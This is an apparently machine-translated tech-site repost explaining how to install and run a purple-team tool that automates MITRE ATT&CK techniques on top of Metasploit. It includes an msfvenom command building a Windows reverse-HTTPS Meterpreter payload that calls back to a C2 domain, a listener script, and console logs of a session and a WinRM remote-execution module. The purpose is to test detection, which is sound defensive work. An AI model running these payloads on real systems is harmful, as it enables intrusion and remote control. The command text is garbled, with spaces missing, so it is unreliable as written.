Shulou(Shulou.com)06/02 Report--

Today, I will talk to you about how to use the automated penetration testing tool PTAA, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

In order to evaluate the ability of security detection and event response, we are trying to find a way to automatically simulate the opponent's attack strategy. Through the research, we design the MITRE ATT&CK ™TTPs and present the post module in the form of Metasploit Framework module. At present, we can automatically simulate more than 100 kinds of TTPs.

The advantage of Metasploit lies in its stable, robust and rich function library. The module of the framework can interact directly with the operating system API, and it is flexible and easy to expand. In addition, we can also use Metasploit's execute_powershell module to simulate functions such as execution in .NET memory. This will allow blue teams to ensure that their tools effectively sound alerts when specific TTP behaviors are detected and do not perform specific code or actions. (for example, encoded PowerShell)

Our tool is based on the latest version of Metasploit development (April 9, 2019: [Metasploit download address]). In the process of implementing the automation mechanism, we have reduced the amount of modifications to the source code of the Metasploit framework as much as possible to ensure that users can experience close to the native Metasploit.

Tool installation

C2 server-register and build a cloud virtual machine device

DNS- selects a domain name and registers it in DNS

SSL- We recommend that you use a valid SSL certificate for testing. It is recommended to use LetsEncrypt:

ExportDNS_NAME= "mytestdomain.com" wget https://dl.eff.org/certbot-autochmoda+x. / certbot-auto./certbot-auto-q./certbot-autocertonly-d $DNS_NAME-standalone-register-unsafely-without-email-n--agree-tosDebian/Ubuntu

Installation source: https://github.com/rapid7/metasploit-framework/tree/master/docker

Install docker:

Curl-fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add-apt- keyfingerprint 0EBFCD88add-apt-repository\ "deb [arch=amd64] https://download.docker.com/linux/debian jessie stable" apt-get-y updateapt-get-y install docker-ce

Get the project source code:

Git clone git@github.com:praetorian-inc/purple-team-attack-automation.gitcd purple-team-attack-automation

Modify LHOST and external port:

Echo "version: '3'services: ms: environment: # example of setting LHOST LHOST: 0.0.0.0 # example of adding more ports ports:-80808080443-80:80" > docker-compose.local.override.yml

Set the COMPOSE_FILE environment variable and load the local file:

Echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" > > .env

Build the container:

Docker-composebuild

Run the container:

. / docker/bin/msfconsole

Modify metasploit directory permissions:

Chmod-R ugo+rw ~ .msf4Payloadcd ~ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall & &\ chmod 755 msfinstall & &\. / msfinstallmsfvenom-p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443-ax64-f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pemStagerVerifySSLCert=true-o ~ / attack-testing.exe listener

You can use the sample resource script to turn on the listener:

$echo 'print_status ("StartingHTTPS listener for Windows x64 meterpreter on port 443.") run_single ("useexploit/multi/handler") run_single ("setpayload windows/x64/meterpreter_reverse_https") run_single ("setlport 443") run_single ("setHandlerSSLCert MSF.pem") run_single ("setExitOnSession false") run_single ("setStagerVerifySSLCert true") run_single ("exploit-j")' > ~ / purple-team-attack-automation/scripts/resource/windows_listener.rc

When the listener is enabled, payload will run with administrator privileges and send callback messages.

Use the module msf5auxiliary (scanner/smb/impacket/secretsdump) > resource windows_listener.rc [*] Processing / usr/src/metasploit-framework/scripts/resource/windows_listener.rcfor ERB directives. [*] resource (/ usr/src/metasploit-framework/scripts/resource/windows_listener.rc) > Ruby Code (270bytes) [*] Starting HTTPS listener for Windows x64 meterpreter on port 443.payload> windows/x64/meterpreter_reverse_httpslport= > 443lhost = > 0.0.0.0 [*] Exploit running as background job 0. [*] Exploit completed But no session was created.msf5exploit (multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443[*]https://0.0.0.0:443 handling request from 192.168.137.11 (UUID: czgdxj3z) Redirecting stageless connection from/2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn withUA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' [*] https://0.0.0.0:443 handling request from 192.168.137.11 (UUID: czgdxj3z) Attaching orphaned/stageless session... [*] Meterpreter session 1 opened (172.18.0.3 Meterpreter session 52012) at2019-04-15 16:10:27 + 0000 msf5post (windows/purple/t1005) > use post/windows/purple/t1028msf5post (windows/purple/t1028) > info Name: Windows Remote Management (T1028) Windows-Purple Team Module: post/windows/purple/t1028 Platform: Windows Arch: Rank: Normal Providedby: Praetorian Compatiblesession types: Meterpreter Basicoptions: Name Current Setting Required Description-CLEANUP true Yes Close any instances ofcalc CMD winrm qc-Q & winrm ic wmicimv2/Win32_Process@ {CommandLine= "calc"} yes Command to execute SESSION 1 yes The session to run thismodule on. Description: Execution, Lateral Movement: Windows RemoteManagement (WinRM) is the name of both a Windows service and aprotocol that allows a user to interact with a remote system (e.g., runan executable, modify the Registry, modify services). It may becalled with the winrm command or by any number of programs such asPowerShell. References: CVE: Not available https://attack.mitre.org/wiki/Technique/T1028 msf5post (windows/purple/t1028) > exploit [+] Found an instance of Calculator running. Killing it. [*] Executing 'cmd / c winrm qc-Q & winrm ic wmicimv2/Win32_Process@ {CommandLine= "calc"}' on # [!] WinRM service is already running on this machine.WSManFault Message ProviderFault WSManFault Message = WinRM firewall exceptionwill not work since one of the network connection types on this machine is setto Public. Change the network connection type to either Domain or Private andtry again. Errornumber:-2144108183 0x80338169WinRMfirewall exception will not work since one of the network connection types onthis machine is set to Public. Change the network connection type to eitherDomain or Private and try again.create_OUTPUT ProcessId = 5456 ReturnValue = 0 [+] Module T1028W execution successful. [+] Found an instance of Calculator running. Killing it. [+] Found an instance of Calculator running Killing it. [*] Post module execution completedmsf5post (windows/purple/t1028) > after reading the above, do you have any further understanding of how to use the automated penetration testing tool PTAA? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.